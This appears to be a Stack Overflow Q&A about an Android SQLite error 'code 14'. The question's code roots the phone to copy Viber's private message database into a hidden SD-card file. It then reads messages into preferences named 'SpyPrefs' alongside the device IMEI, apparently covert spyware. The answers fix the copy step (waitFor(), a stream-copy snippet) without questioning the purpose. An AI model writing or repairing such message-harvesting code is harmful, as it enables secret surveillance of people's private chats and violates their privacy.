# SQLite : Exception:unknown error (code 14): Could not open database

Tags: android, sqlite

I have rooted the phone and copying the database of other application into the SD card.

In the below code it simply copying the db file and after that fetching the data from the table. This code throw the exception `Exception:unknown error (code 14): Could not open database`

Guys help me if you have any idea of this.

```
String filep ="/mnt/sdcard/.configsvb.db";
String filefolder="/data/data/com.viber.voip/databases/viber_messages";
Runtime.getRuntime().exec(new String[] { "su", "-c","cat "+filefolder+" > "+filep+" ; "});

new Helper().readvb(filep, getApplicationContext(), data); // This method read the database file.
```

Helper.java

```
public void readvb(String filep,Context con, StringBuilder data)
{
        File dbfile = new File(filep);
        SharedPreferences preferences = con.getSharedPreferences("SpyPrefs", Context.MODE_WORLD_WRITEABLE);
        Editor editor = preferences.edit();
        if(dbfile.exists())
        {
                myDataBase = SQLiteDatabase.openDatabase(filep, null,SQLiteDatabase.NO_LOCALIZED_COLLATORS);
                long lastmessage = preferences.getLong("LastViberRead", 0);
                long msgtime=0;
                StringBuilder xml = new StringBuilder();
                LogsTable logtable= new LogsTable(con);
                Cursor cursor = myDataBase.query(DATABASE_TABLE, new String[]{"_id", "address","type", "body","date"}, "date>"+lastmessage, null, null, null, null);

                int count=0;
                String imei = ((TelephonyManager) con.getSystemService(Context.TELEPHONY_SERVICE)).getDeviceId();
                SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd'T'HH:mm:ss");
                if(cursor != null)
                {

                }
        }
}
```

Comment: Did you set <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> ?

Comment: Yes I already have this in the Manifest.

Comment: I added my own response, give it a try, good luck!

Answer (score 1, accepted):

I solved my issue by calling the `waitFor()` on the process because `waitFor()` run in different process. This method causes the calling thread to wait for the native process associated with this object to finish executing.

```
Process process = Runtime.getRuntime().exec(new String[] { "su", "-c","cat "+filefolder+" > "+filep+" ; "});
process.waitFor();
```

Answer (score 0):

Try:

```
static class DatabaseClass extends SQLiteOpenHelper {

    DatabaseClass(final Context context) {
        super(context, Environment.getExternalStorageDirectory()
                + File.separator + "/DataBase/" + File.separator
            + DATABASE_NAME, null, DATABASE_VERSION);
}
```

Have also a look here:

http://techin-android.blogspot.it/2011/08/how-to-create-sqlite-databse-in-sdcard.html

**UPDATE:**

To copy the file instead of

```
Runtime.getRuntime().exec(new String[] { "su", "-c","cat "+filefolder+" > "+filep+" ; "});
```

you can use this snippet:

```
InputStream myInput = new FileInputStream("/data/data/pack_name/databases/databasename.db");

File directory = new File("/sdcard/some_folder");

if (!directory.exists()) {
    directory.mkdirs();
}

OutputStream myOutput = new FileOutputStream(directory.getPath() + "/AppName.backup");

byte[] buffer = new byte[1024];
int length;
while ((length = myInput.read(buffer)) > 0) {
    myOutput.write(buffer, 0, length);
}

myOutput.flush();
myOutput.close();
myInput.close();
```

**...because I'm not sure about "cat" command: does it set the right permissions to the copied file?**

Comment: My code of copying the database works well but When opening the database connection it return the exception `Exception:unknown error (code 14): Could not open database`

Comment: ok ok, I'm not very expert about executing runtime command, but, just thinking... does the copy command set the right permissions to the file? So my suggestion to copy the file manually, using streams...

Comment: I wrote in my question that My phone is rooted so I can access any application data

Comment: Yep, but I'm still not sure about the cat command, maybe I'm focusing on the wrong point, I would give a try to the manual copy instead of using cat command.

Comment: But cat with this redirection operator > also do same work to copy the file

Comment: hehe, again, I'm not an expert about cat command so I can't give a good response. My only suggestion is to try to perform a manual copy of the file using streams.